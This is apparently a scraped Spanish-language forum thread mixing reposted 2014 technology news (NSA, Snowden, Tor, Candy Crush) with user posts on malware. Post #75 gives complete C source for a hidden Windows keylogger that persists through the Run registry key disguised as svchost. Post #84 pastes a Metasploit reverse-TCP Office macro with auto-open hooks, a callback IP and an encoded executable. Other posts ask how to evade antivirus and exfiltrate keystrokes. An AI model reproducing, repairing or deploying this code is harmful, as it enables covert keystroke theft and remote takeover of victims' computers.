"Hay una competencia impresionante en el mercado, y por más exitoso que sea un juego, tiende a declinar. Lo mismo ocurrió con Angry Birds", explicó a ese respecto el bloguero de tecnología de BBC Mundo, David Cuen.
"El declive de Candy Crush está pasando, va a desaparecer", añadió. Pero matizó: "Eso no significa, sin embargo, que la empresa que la desarrolló decaerá. Por el contrario, en la era de la economía movil seguirá ganando dinero. Esto no será el inicio del fin de la empresa".
Efectivamente, la situación no es catastrófica para la compañía. Reportó un ingreso trimestral de US$594 millones, comparado con los US$456 que se embolsó en el mismo período el año pasado.
Pero para que el crecimiento no pare, los inversores esperan que King Digital Entertainment lance productos cuya hegemonía sea más duradera. Será cuestión de tener fe en el "juego hermano" de Candy Crush Saga.

http://www.bbc.co.uk/mundo/noticias/2014/08/140813_tecnologia_declive_candy_crush_lv.shtml
#70
Según las últimas revelaciones de Edward Snowden, la Agencia de Seguridad Nacional estadounidense dispone de un programa secreto llamado MonsterMind capaz de responder a los ataques cibernéticos sin intervención humana.

En su última revelación, el excontratista de la CIA Edward Snowden dijo a la revista 'Wired' que la NSA cuenta con un programa secreto de funcionamiento autónomo llamado MonsterMind que, además de poder responder automáticamente a ciberataques, podría causar una pesadilla diplomática internacional puesto que los ataques lanzados por el propio programa a menudo interfieren en las computadoras de terceros alojados en países extranjeros.

Y lo más grave: "Estos ataques pueden ser falsificados", aseguró Snowden. "Podríamos tener a alguien sentado en China, por ejemplo, haciendo que parezca que el que ha realizado el ataque es originario de Rusia. Y entonces terminamos 'disparando' hacia un hospital ruso. ¿Qué pasaría después?".

Snowden mencionó también que EE.UU. podría haber estado detrás del apagón masivo de Internet en Siria en 2012, cuando el país estaba en plena guerra civil. EE.UU. habría intentado recibir acceso al tráfico del país árabe, y un fallo durante el proceso podría haber causado la avería.

José Luis Camacho, investigador de conspiraciones y bloguero, cuestiona la legitimidad del funcionamiento del programa 'Monstermin', ya que –según él-, podría violar la constitución de Estados Unidos. "En EE.UU. la propia Cuarta enmienda les prohíbe hacer una monitorización de las comunicaciones privadas y este sistema está infringiendo la Cuarta enmienda", explica a RT.

Este jueves el Servicio Federal de Migración de Rusia ha aprobado la petición de Edward Snowden de prolongar su asilo temporal en el país, según informa el abogado del extécnico, Anatoli Kucherena. "Es imposible la extradición de Snowden a EE.UU.", aseguró el abogado.

http://actualidad.rt.com/actualidad/view/137026-snowden-ans-programa-secreto-sin-intervencion-humana
#71
¿El ciberespacio se queda sin espacio?: Internet alcanza ya un tamaño preocupante

Expertos alertan que los problemas técnicos que han provocado esta semana la caída de eBay podrían estar vinculados con la falta de memoria de Internet y la sobrecarga de los routers.



Los problemas técnicos que han provocado caídas de sitios web como el portal de subastas eBay podrían hacerse habituales debido al crecimiento del tráfico de internet y a la falta del espacio de memoria virtual, informa 'The Telegraph' citando a expertos.

Se estima que estos fallos técnicos podrían acarrear pérdidas millonarias para la economía debido a las caídas de las ventas debido a que zonas de varios sitios web ya están totalmente 'llenas'.

Este martes eBay quedó inaccesible durante varias horas para los usuarios de Reino Unido, así como de otras partes de Europa y de algunos lugares de EE.UU. La cuenta de eBay en Twitter se llenó de quejas de comerciantes que usan la página web de la compañía para obtener beneficio y exigieron compensaciones por la pérdida de ventas.

"Se trata realmente de que los routers están sobrecargados debido al número creciente de dispositivos usados y al panorama de Internet cada vez más fragmentado en pequeñas redes", explica Joss Wright, experto del Instituto de Internet de Oxford. Los routers ya no soportan el crecimiento del tráfico al igual que "el cerebro humano no podría recordar todos los caminos secundarios de un largo viaje en coche", añade.

Los routers son dispositivos que almacenan las tablas de rutas en la memoria. Aunque cada router tiene un número distinto de rutas en su memoria, la mayoría está cerca de las 512.000. Los expertos estiman que esta cifra es el punto de ruptura que los routers no pueden sobrepasar.

James Gill, el jefe ejecutivo de la empresa 'GoSquard', considera que estos fallos técnicos podrían costar millones de dólares a grandes empresas como eBay y que se necesitaría mucho tiempo para actualizar su hardware. "Si este tipo de fallos se convierte en algo regular, entonces será un problema grave tanto para las empresas como para la economía en general", alerta.

http://actualidad.rt.com/ciencias/view/137072-expertos-internet-tamano-problemas-serios
#72
La Agencia de Seguridad Nacional de EE.UU. (NSA) está siendo nuevamente objeto de demanda, esta vez por no facilitar los archivos sobre su antiguo director, cuya conducta es motivo de críticas.



Esta semana el periodista Jason Leopold presentó una denuncia contra la NSA, la cual se suma a una serie de demandas que han surgido desde que el excontratista de la CIA Edward Snowden desvelara el espionaje de EE.UU. sobre millones de personas y gobiernos en todo el mundo.

La denuncia del periodista se debe a que la agencia se ha negado a suministrar la situación financiera relacionada con su exdirector, el general Keith Alexander, quien ahora ofrece consultoría en seguridad cibernética a empresas por un valor de 1 millón de dólares al mes, según informó Motherboard.

Pero la NSA rechazó la petición de Leopold. En su demanda, que busca obligar la liberación de los documentos de Alexander, Leopold argumenta que están siendo retenidos ilegalmente. En virtud de la Ley de Ética Gubernamental de 1978, la NSA tiene "un deber obligatorio, no discrecional para suministrar los registros solicitados", dice el periodista en la denuncia.


El representante demócrata por el estado de Florida, Alan Grayson, expresó sus preocupaciones en una carta. "Escribo con preocupación por la posible revelación de información clasificada por parte del exdirector de la Agencia de Seguridad Nacional Keith Alexander".

"La revelación o el mal uso de información clasificada con fines de lucro es, como bien sabe el señor Alexander, un delito grave. Me pregunto cómo el Señor Alexander puede proporcionar cualquiera de los servicios que está ofreciendo a menos que divulgue o haga mal uso de la información, incluyendo las fuentes y métodos clasificados extremadamente sensibles. Sin la información clasificada que adquirió en su anterior posición, literalmente, no tendría nada que ofrecer".

http://actualidad.rt.com/actualidad/view/135764-nsa-demanda-director-vender-informacion-snowden
#73
Investigadores descubrieron en una herramienta integrada en un gran número de 'smartphones' vulnerabilidades que permitirían a los 'hackers' instalar un código malicioso y tomar el control del dispositivo.



Las vulnerabilidades se encuentran dentro de unas herramientas de gestión que los fabricantes y los operadores integraron en los teléfonos y tabletas para configurarlos de forma remota. Aunque algunos diseñan su propia herramienta, la mayoría utiliza una desarrollada por un tercer vendedor específico al que los investigadores, Mathew Solnik y Marc Blanchou de Accuvant Labs, no identificarán hasta que presenten sus pruebas la próxima semana en una conferencia de seguridad en Las Vegas, informa Wired.

Los operadores usan la herramienta de gestión para enviar remotamente las actualizaciones de firmware, configurar los teléfonos para la itinerancia  o bloquear los dispositivos a los proveedores de servicios específicos. Pueden elegir en la herramienta las funciones básicas o solicitar otras adicionales. Solnik encontró que algunos teléfonos tienen las características para limpiar de forma remota el dispositivo, cambiar el PIN para el bloqueo de pantalla, configurar y desactivar las aplicaciones etc. Y los sistemas dan al operador la opción de hacer los cambios sin preguntar al consumidor, observa el medio.

Asimismo, cuantas más características de la herramienta de gestión ofrece el operador, más puede hacer un atacante. Como mínimo, todos los dispositivos examinados permitirían a un 'hacker' cambiar toda la funcionalidad de la red celular y controlar las actualizaciones de firmware. Incluso los teléfonos que utilizan únicamente el sistema de gestión más básico tienen vulnerabilidades de memoria que permitirían a un agresor ejecutar un código o instalar aplicaciones maliciosas, de acuerdo con los autores del estudio.

Según los investigadores, la herramienta se utiliza de alguna forma en más de 2.000 millones de teléfonos de todo el mundo. Las vulnerabilidades hasta ahora han sido encontradas en dispositivos de Android y BlackBerry y en un pequeño número de iPhones. Los dispositivos de Windows Mobile aún no se han comprobado.

Los autores del estudio dicen que por ahora no hay señales de que alguien se haya aprovechado de las vulnerabilidades, y la compañía que hace la herramienta anunció que ha emitido una solución que resolvería el problema.

http://actualidad.rt.com/actualidad/view/135753-hackers-controlar-movil-herramienta-integrada
#74
Estuve leendo un libro de 2005 sobre ingeniería inversa a raíz de eso surge mi pregunta. Aun funcionan los ofuscadores de código, como EXECryptor, StarForce suite  para hacer indetectable un virus, o la ofuscación del código fuente tendría que ser manual, estuve buscando en google y no encontré nada sobre el tema, el themida como todos sabemos ya no funciona, que hay de los programas anteriormente mencionados?

En libros actuales de 2014, sobre ingeniería inversa, aun se menciona que el método de ofuscación de código, puede ser usado en malwares
#75
Este es el codigo fuente del keylogger

Citar#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
   HWND stealth; /*creating stealth (window is not visible)*/
   AllocConsole();
   stealth=FindWindowA("ConsoleWindowClass",NULL);
   ShowWindow(stealth,0);

   int test,create;
   test=test_key();/*check if key is available for opening*/
       
   if (test==2)/*create key*/
   {
       char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
       create=create_key(path);
         
   }
       

   int t=get_keys();
   
   return t;


int get_keys(void)
{
           short character;
             while(1)
             {
                    sleep(10);/*to prevent 100% cpu usage*/
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        { 
                           
                            FILE *file;
                            file=fopen("svchost.log","a+");
                            if(file==NULL)
                            {
                                    return 1;
                            }           
                            if(file!=NULL)
                            {       
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }       
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case VK_SPACE:
                                              fputc(' ',file);
                                              fclose(file);
                                              break;   
                                              case VK_SHIFT:
                                              fputs("[SHIFT]",file);
                                              fclose(file);
                                              break;                                           
                                              case VK_RETURN:
                                              fputs("\n[ENTER]",file);
                                              fclose(file);
                                              break;
                                              case VK_BACK:
                                              fputs("[BACKSPACE]",file);
                                              fclose(file);
                                              break;
                                              case VK_TAB:
                                              fputs("[TAB]",file);
                                              fclose(file);
                                              break;
                                              case VK_CONTROL:
                                              fputs("[CTRL]",file);
                                              fclose(file);
                                              break;   
                                              case VK_DELETE:
                                              fputs("[DEL]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_1:
                                              fputs("[;:]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_2:
                                              fputs("[/?]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_3:
                                              fputs("[`~]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_4:
                                              fputs("[ [{ ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_5:
                                              fputs("[\\|]",file);
                                              fclose(file);
                                              break;                               
                                              case VK_OEM_6:
                                              fputs("[ ]} ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_7:
                                              fputs("['\"]",file);
                                              fclose(file);
                                              break;
                                              /*case VK_OEM_PLUS:
                                              fputc('+',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_COMMA:
                                              fputc(',',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_MINUS:
                                              fputc('-',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_PERIOD:
                                              fputc('.',file);
                                              fclose(file);
                                              break;*/
                                              case VK_NUMPAD0:
                                              fputc('0',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',file);
                                              fclose(file);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("[CAPS LOCK]",file);
                                              fclose(file);
                                              break;
                                              default:
                                              fclose(file);
                                              break;
                                       }       
                                  }   
                             }       
                   }   
               }                 
                   
           }
           return EXIT_SUCCESS;                           
}                                               

int test_key(void)
{
   int check;
   HKEY hKey;
   char path[BUFSIZE];
   DWORD buf_length=BUFSIZE;
   int reg_key;
   
   reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
   if(reg_key!=0)
   {   
       check=1;
       return check;
   }       
         
   reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
   
   if((reg_key!=0)||(buf_length>BUFSIZE))
       check=2;
   if(reg_key==0)
       check=0;
       
   RegCloseKey(hKey);
   return check; 
}

int create_key(char *path)

       int reg_key,check;
       
       HKEY hkey;
       
       reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
       if(reg_key==0)
       {
               RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
               check=0;
               return check;
       }
       if(reg_key!=0)
               check=1;
               
       return check;
}

#76
Me estoy iniciando en el tema de la programación, estoy tratando de compilar C++ en backtrack 5 r3 de 32 bit, usando codeblock IDE 8.02 cuando doy click en compilar,  solo me crea un archivo de texto y en la ventana de Built log, solo me aparece un mensaje que dice Nothing to be done.

A que se debe este problema?
#77
La canciller Angela Merkel decide espiar a sus dos socios en la OTAN tras exigir al jefe de la estación de la CIA en Berlín que dejara Alemania.



Angela Merkel, ha anunciado que su país vigilará las acciones de los agentes de los servicios estadounidenses y británicos en su territorio, informa The Daily Mail.

La decisión de la canciller se considera una respuesta al escándalo estallado recientemente en Alemania tras conocerse que la Agencia de Seguridad Nacional de EE.UU. (NSA, por sus siglas en inglés) espiaba a los ciudadanos de la República Federal.

Después de hacerse público que el NSA escuchaba a escondidas el teléfono móvil de Merkel, la canciller exigió que el jefe de la CIA en Berlín abandonara el territorio alemán.

La agencia de inteligencia alemana (BND, por sus siglas en alemán) llevará a cabo estricta vigilancia de las acciones de los agentes estadounidenses en territorio alemán. Esta decisión marca el primer caso de la observación de la inteligencia aliada por parte de Alemania desde el 1945, cuando las autoridades de Alemania Occidental decidieron dar libertad a estos servicios.

Esta semana el presidente de los EE.UU., Barack Obama, envió al jefe del Gabinete de la Casa Blanca, Denis McDonough, y a la asesora para la lucha contra el terrorismo, Lisa Monaco, a Berlín. Oficiales de la Casa Blanca afirman que en la capital alemana abordaron asuntos de seguridad.

"Sólo a través de negociaciones y acuerdos se puede restablecer la confianza. Aseguraremos que esas negociaciones tengan lugar, pero por ahora no puedo dar ningún dato concreto", admitió Merkel. Sin embargo, la canciller alemana sostiene que Alemania y EE.UU. siguen siendo socios y "nada puede cambiarlo".

Entretanto, la Casa Blanca no ha hecho ningún comentario.

Merkel desmintió la posibilidad de conceder permiso al ex-agente del NSA Edward Snowden de refugiarse en Alemania.

Un funcionario de la Casa Blanca aseguró que la CIA no utilizaría programas de vacunación como fachada para actividades de inteligencia. La CIA afirma que no tiene intención de utilizar los materiales genéticos obtenidos en el marco de estos programas.   

http://actualidad.rt.com/actualidad/view/135049-alemania-eeuu-espionaje-escandalo-reinounido
#78
Al Qaeda, algunos países y grupos criminales están planeando amplios ataques cibernéticos contra la infraestructura estadounidense que se podrían comparar con el 11-S, afirmó un alto funcionario de justicia de EE.UU.



"Estamos en el momento previo a un 11-S cibernético", dijo John Carlin, fiscal general adjunto de seguridad nacional, citado por el portal Washington Free Beacon.

En una conferencia sobre seguridad, Carlin mencionó que recientemente el líder de Al Qaeda, Ayman al Zawahiri, publicó un vídeo en el que señaló que la red terrorista planea ciberataques contra redes eléctricas y financieras de EE.UU.

Como otro ejemplo, el funcionario recordó una operación contra la petrolera estatal saudita Aramco, que dejó fuera de servicio unos 30.000 ordenadores que controlaban los elementos cruciales de la infraestructura energética del país.

El fiscal general adjunto también se refirió al grupo criminal Gameover Zeus, que las autoridades estadounidenses lograron desarticular este año, como un ejemplo de potenciales ataques.

Se trata de una red que difundía los virus Gameover Zeus (conocido también como GOZeus y P2PZeus), que robaba de los ordenadores información bancaria y otros datos confidenciales, y Cryptolocker, un virus que bloqueaba los ordenadores y exigía a las víctimas un pago a cambio de la contraseña para acceder a la máquina. 

"Si un grupo terrorista se hace con este tipo de acceso o capacidad, no pedirán dinero ni se tomarán tiempo para destruir los datos", resaltó Carlin llamando a una cooperación entre el sector público y privado para lidiar con la amenaza.

Respecto a ciertos Estados que pueden amenazar las redes estadounidenses, mencionó las acusaciones formales del Gobierno de EE.UU. presentadas contra cinco miembros del Ejército Popular de Liberación de China por el presunto robo de secretos de empresas privadas estadounidenses a través de medios cibernéticos. 

Carlin dijo que el Departamento de Justicia se enfrenta a los ataques cibernéticos con métodos similares a la lucha antiterrorista.

"Hemos pasado a vigilar mejor lo que está pasando respecto a la información que está siendo robada día y noche de las computadoras de los estadounidenses creativos e innovadores y usada por sus rivales en contra de las empresas estadounidenses", comentó. 

Describió el nuevo enfoque de "multifacético y estratégico", que debe trazar una "línea roja" para disuadir a otros países de realizar ataques cibernéticos.

"Cada vez les saldrá más caro realizar este tipo de actividad en suelo estadounidense hasta que el robo de datos cese", prometió el funcionario. 

http://actualidad.rt.com/actualidad/view/135024-qaeda-planean-ataque-cibernetico-eeuu-11s
#79
No veo que exista algo que no lo permita, en las reglas del foro, por que cuando un tema tiene varios comentarios en la sección de noticias lo bloquean, y no permiten que se siga comentando, alguien me puede aclarar esa duda.
#80
Para algunos es un refugio de pedófilos, traficantes, drogadictos y sicarios. Para otros el único territorio para defensores de derechos humanos que luchan contra tiranías o periodistas que investigan a los poderosos. Pocos fenómenos generan interpretaciones tan opuestas en nuestros tiempos como la internet oscura o dark net.


La parte oscura de internet es un dolor de cabeza para las agencias de inteligencia.

En esta parte de la red, la información se mueve cifrada y antes de llegar a destino pasa por múltiples servidores que forman parte de redes de voluntarios. Cada paso remueve un nivel de cifrado hasta que el mensaje llega al destinatario, lo que hace muy difícil rastrear al autor. Una de las formas más populares para acceder a ella es descargar un navegador especial llamado Tor.

Los gobiernos y sus fuerzas de seguridad dicen que la mayoría de sus usuarios son criminales, pero sus defensores responden que simplemente están en contra de las regulaciones establecidas sobre la red y que el sueño original de sus creadores era una internet libre y anónima.
Pero más allá de sus diferencias, un elemento en común une a los que ingresan a este sector de la red: mantener su anonimato.
En esta lucha por mantener oculta la identidad de los internautas, los enemigos de la dark net dicen tener un arma nueva, un virus que promete revelar los secretos de este sector de la red.
Pero uno de los creadores del sistema que permite el anonimato de los usuarios asegura que el virus "no es el fin del mundo".
Y en el medio de este enfrentamiento se despliega una trama propia de una novela policial con conferencistas desaparecidos, filtraciones y desmentidos.


Los responsables de Tor dicen tener la situación bajo control.

Virus "interesante"

A comienzos de este mes, dos investigadores anunciaron sus planes de revelar una forma de combatir el anonimato en la internet oscura.
Alexander Volynkin y Michael McCor, dos expertos en seguridad del equipo de respuestas de emergencias informáticas de la Universidad Carnegie Mellon (CERT), tenían planeado mostrar su arma secreta en la conferencia Black Hat que iba a tener lugar en Las Vegas en agosto.
Sin embargo, un aviso publicado en el sitio de internet del evento indica ahora que los abogados de la universidad se han contactado con los organizadores de la conferencia para decirles que la presencia de Volynkin y McCor se ha cancelado.
"Desafortunadamente, el señor Volynkin no podrá hablar debido a que los materiales que iba a presentar no han sido aprobados aún por el Instituto de Ingeniería Informática de la Universidad Carnegie Mellon para su difusión pública", indica el mensaje.
Roger Dingledine, uno de los creadores de Tor, publicó luego un mensaje en el que señaló que Tor Project, la organización que suministra gratuitamente el programa informático para utilizar Tor, había sido "informalmente" informada de los descubrimientos que iban a ser revelados en el evento de Las Vegas.
"Creo que puedo manejar lo que ellos crearon y corregirlo", dijo Dingledine y añadió:
"Basados en nuestros planes actuales, instalaremos una reparación para contrarrestar este virus particular que encontraron. El virus es interesante, pero no es el fin del mundo".

Fallas de sistema


Los resultados de la investigación iban a ser revelados en Las Vegas.

Tor fue desarrollado originalmente por el Laboratorio de Investigación Naval de Estados Unidos y luego fue financiado por el grupo de derechos digitales Electronic Frontier Foundation, Google, la Fundación Nacional de Ciencia estadounidense, entre otros.
Lo utilizan desde funcionarios, militares y periodistas que quieren comunicarse con soplones, hasta personas comunes que simplemente no quieren que los rastreen cuando navegan por la red.
Pero también ha sido asociado con actividades ilegales, desde comprar heroína hasta contratar un sicario o descargar videos abusivos de menores.

Los investigadores habían prometido revelar cómo un pequeño dispositivo, con un valor de US$3.000, podía ser utilizado "para explotar fallas fundamentales en el diseño y la implementación de Tor" y mostrar las direcciones de internet de sus usuarios y los servidores de computadoras utilizados para esconder sus servicios.
"Lo sabemos porque lo hemos probado", añadieron.
Christopher Soghoian, un experto en tecnología de la Unión de Libertades Civiles de EE.UU., especuló que la Universidad Carnegie Mellon pudo haberse preocupado por demandas de usuarios de Tor que podían alegar que su privacidad había sido violada.
"Vigilar el tráfico de Tor es potencialmente una violación a varios estatutos federales criminales", escribió en un tuit Soghoian.
Sin embargo, una vocera de la universidad contactada por la BBC se limitó a decir que no tenían nada que agregar "al comunicado que ya se difundió por los organizadores de la conferencia Black Hat".

Buscando a Tor


El FBI es uno de los servicios de inteligencia que ha intentado ingresar a la internet oscura.

Aunque los detalles de las supuestas fallas de Tor aún no han salido al dominio público, sí se han conocido varios informes de las autoridades de distintos países por ingresar en este sistema.
La cadena de noticias alemana ARD informó que a comienzos de este mes, ciberespías de la Agencia Nacional de Seguridad (NSA por sus siglas en inglés) estaban vigilando dos servidores de Tor en Alemania para averiguar las direcciones de los usuarios que los utilizaban.
Un supuesta filtración de la agencia de seguridad británica GCHQ indicó por su parte que este servicio de inteligencia había desarrollado su propio navegador Tor.
Y en 2013, el FBI reconoció que una falla en el navegador Firefox le había permitido identificar usuarios de Tor en su esfuerzo por luchar contra la difusión de imágenes de pederastas divulgas en la red.


http://www.bbc.co.uk/mundo/noticias/2014/07/140724_internet_oscura_lucha_identidad_mz.shtml
#81
La Casa Blanca vigila a los visitantes de su web con un nuevo sistema de seguimiento en línea casi imposible de bloquear, según un informe de la Fundación de Fronteras Electrónicas (Electronic Frontier Foundation, EFF por sus siglas en inglés).


La EFF examinó la web oficial de la Casa Blanca para comprobar si usa el 'software' espía secreto recientemente revelado y encontró que este está presente en todas las páginas del sitio.   

A principios de esta semana el portal ProPublica aseguró que al menos el 5% de los 100.000 sitios más importantes de Internet utilizan el 'software', denominado 'canvas fingerprinting' (sistema de identificación mediante huellas digitales), que es casi imposible de detener con el uso de herramientas de privacidad convencionales. 

El 'software' utilizado por la Casa Blanca en su web fue desarrollado por el proveedor de marcadores sociales AddThis, y se emplea en sitios web populares. Una lista de los sitios conocidos que utilizan el mencionado 'software' se puede consultar aquí.   

Para efectuar vigilancia, un sitio web normalmente envía 'cookies' o archivos a un ordenador determinado, o examina varias propiedades del dispositivo, pero sistemas antirrastreo son capaces de bloquear ese tipo de actividades.

No obstante, el nuevo sistema de seguimiento no transmite 'cookies' ni archivos y no necesita leer las propiedades, y para navegadores web y herramientas antirrastreo su mecanismo parece operar como el de una página web normal.   

Cuando un usuario visita un sitio web que cuenta con este tipo de tecnología de seguimiento, la página envía a su navegador de Internet una petición para generar una imagen oculta que contiene un texto. Debido a que cada ordenador representa la imagen de una manera diferente, el dibujo, es decir, sus 'huellas digitales', se utiliza para etiquetar el dispositivo con un número único que permite a los seguidores vigilar la actividad de navegación del usuario a través de Internet.

Es de destacar que el uso de este tipo de 'software' contradice las políticas de privacidad publicadas en la propia página de la Casa Blanca. AddThis, a su vez, indica que no utiliza ningún tipo de dato que recoge de los sitios web del Gobierno. Hasta el momento, dice tener sólo los datos usados para "la investigación y el desarrollo interno".



http://actualidad.rt.com/actualidad/view/134931-casa-blanca-vigila-web-addthis-software
#82
Un equipo de jugadores chinos se embolsilló US$5 millones de premio tras ganar el torneo de videojuegos más lucrativo del mundo.


Este año hubo torneos masivos de varios de varios juegos.

The International enfrenta a los mejores jugadores de Dota2, un juego creado por Valve.

El equipo NewBee venció a otro equipo chino, llamado Vici Gaming, y se hizo con el título.
Entre todos los premios se repartieron un total de US$10,9 millones. Además de lo que se llevaron los ganadores, los subcampeones ganaron US$1,4 millones, y el resto se distribuyó entre los otros 19 equipos del torneo, que comenzó el 18 de julio en Seattle y duró cuatro días.
Valve donó US$1,6 millones del dinero del premio. El resto lo aportaron jugadores habituales de Dota2, una batalla online para PC que tiene enganchados a millones de jugadores en todo el mundo.
En el juego, cada jugador asume el rol de uno de los 107 héroes. Los jugadores deben colaborar para defenderse y destruir los "ancestros" del rival: estructuras muy protegidas, ubicadas en esquinas opuestas del mapa del juego.


El desarrollador del juego, Valve, donó dinero para los premios del torneo.

En la página web del torneo se pudieron ver retransmisiones en directo de las partidas. Valve organizó también series para enseñar a jugar a nuevos participantes.

Un buen año

Algunos bares, pubs y centros recreativos de todo el mundo organizaron fiestas para la gente que quería ver las finales.
El juego definitivo se pudo ver también en uno de los canales de la web de retransmisiones ESPN.
"Valve ha pensado mucho en cómo empaquetar videojuegos deportivos para que la gente pueda seguirlos, verlos y disfrutarlos", escribió Alice O´Connor en una entrada en la web Rock, Paper, Shotgun.
Michael O´Dell, jefe del equipo británico Team Dignitas, dijo: "Este año ha sido excepcional para eSports (un programador de videojuegos), con torneos masivos de Dota, League of Legends y CS:go (Counter-Strike: Global Offensive). Y vendrán otros. La escena es muy dinámica".

http://www.bbc.co.uk/mundo/noticias/2014/07/140722_videojuegos_concurso_premios_ac.shtml
#83
Existe algún servicio en la nube, que me permita recibir archivos y datos utilizando la dirección IP para el envió.

Por poner un ejemplo, si utilizo un Keylogger, y no se me permite enviar los datos que el Keylogger a capturado a un correo electrónico, porque mi ISP tiene bloqueado el protocolo simple de transferencia de email (SMTP) y no me es posible enviar esos datos a mi ordenador personal, porque mi conexión a internet no es permanente.

Que método se podría utilizar en ese caso?

He buscado en google y no he encontrado nada
#84
Este es el error que me aparece al ejecutar el payload shell reverse tcp en formato vbs

Windows Script Host

Secuencia de comandos: C: ubicacion del payload
Linea:      24
Caracter: 13
Error:       Expected end of statement
Codigo:    800A0401
Origen:     Microsoft VBScript compilation error

El codigo fuente del vbs es este:

Citar'Created by msfpayload (http://www.metasploit.com).
'Payload: windows/shell/reverse_tcp
' Length: 290
'Options: {"LHOST"=>"197.186.55.5", "LPORT"=>"4441"}

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
   Iobcf12
End Sub
Sub Iobcf12()
   Dim Iobcf7 As Integer
   Dim Iobcf1 As String
   Dim Iobcf2 As String
   Dim Iobcf3 As Integer
   Dim Iobcf4 As Paragraph
   Dim Iobcf8 As Integer
   Dim Iobcf9 As Boolean
   Dim Iobcf5 As Integer
   Dim Iobcf11 As String
   Dim Iobcf6 As Byte
   Dim Kijfmicoeo as String
   Kijfmicoeo = "Kijfmicoeo"
   Iobcf1 = "URqWyDZMrNhdF.exe"
   Iobcf2 = Environ("USERPROFILE")
   ChDrive (Iobcf2)
   ChDir (Iobcf2)
   Iobcf3 = FreeFile()
   Open Iobcf1 For Binary As Iobcf3
   For Each Iobcf4 in ActiveDocument.Paragraphs
      DoEvents
         Iobcf11 = Iobcf4.Range.Text
      If (Iobcf9 = True) Then
         Iobcf8 = 1
         While (Iobcf8 < Len(Iobcf11))
            Iobcf6 = Mid(Iobcf11,Iobcf8,4)
            Put #Iobcf3, , Iobcf6
            Iobcf8 = Iobcf8 + 4
         Wend
      ElseIf (InStr(1,Iobcf11,Kijfmicoeo) > 0 And Len(Iobcf11) > 0) Then
         Iobcf9 = True
      End If
   Next
   Close #Iobcf3
   Iobcf13(Iobcf1)
End Sub
Sub Iobcf13(Iobcf10 As String)
   Dim Iobcf7 As Integer
   Dim Iobcf2 As String
   Iobcf2 = Environ("USERPROFILE")
   ChDrive (Iobcf2)
   ChDir (Iobcf2)
   Iobcf7 = Shell(Iobcf10, vbHide)
End Sub
Sub AutoOpen()
   Auto_Open
End Sub
Sub Workbook_Open()
   Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************


Kijfmicoeo
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&H59&H9E&H85&H54&H45&H90&H85&HDE&H59&H9E&H85&HB8&H46&H94&H85&HDC&H59&H9E&H85&HB8&H46&H9A&H85&HD4&H59&H9E&H85&HD7&H59&H9F&H85&H1E&H59&H9E&H85&H54&H51&HC3&H85&HDF&H59&H9E&H85&H83&H7A&HAE&H85&HFF&H59&H9E&H85&H10&H5F&H98&H85&HD6&H59&H9E&H85&H52&H69&H63&H68&HD7

Intente borrando el texto, que aparece en arteriscos y la codificación que aparece al final

